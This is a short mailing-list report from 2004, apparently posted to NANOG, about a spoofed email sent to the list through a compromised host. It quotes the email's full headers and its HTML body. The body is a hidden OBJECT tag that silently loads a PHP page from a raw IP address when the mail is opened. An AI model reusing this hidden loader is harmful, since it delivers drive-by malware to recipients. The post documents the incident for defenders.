Mailed out through an open proxy / hacked machine in some australian museum, with a body that tries to load this html page - http://24.84.218.164:81/641280.php Page is hosted on a shawcable conection (probably another trojaned box) that I can't seem to access, though the host is barely pingable srs
Return-Path: <owner-nanog@merit.edu> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by corpmail.outblaze.com (Postfix) with ESMTP id B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT) Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for <nanog@trapdoor.merit.edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for <nanog@merit.edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Delivered-To: nanog-outgoing@trapdoor.merit.edu Delivered-To: nanog@trapdoor.merit.edu Delivered-To: nanog@merit.edu Date: Thu, 18 Mar 2004 13:40:35 +1000 To: nanog@merit.edu Subject: Request response From: srh@merit.edu Message-ID: <xpvmqgksfnpfrcuagqc@merit.edu> MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-nanog@merit.edu Precedence: bulk Errors-To: owner-nanog-outgoing@merit.edu X-Loop: nanog X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com)
<html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://24.84.218.164:81/641280.php"> </OBJECT></body></html>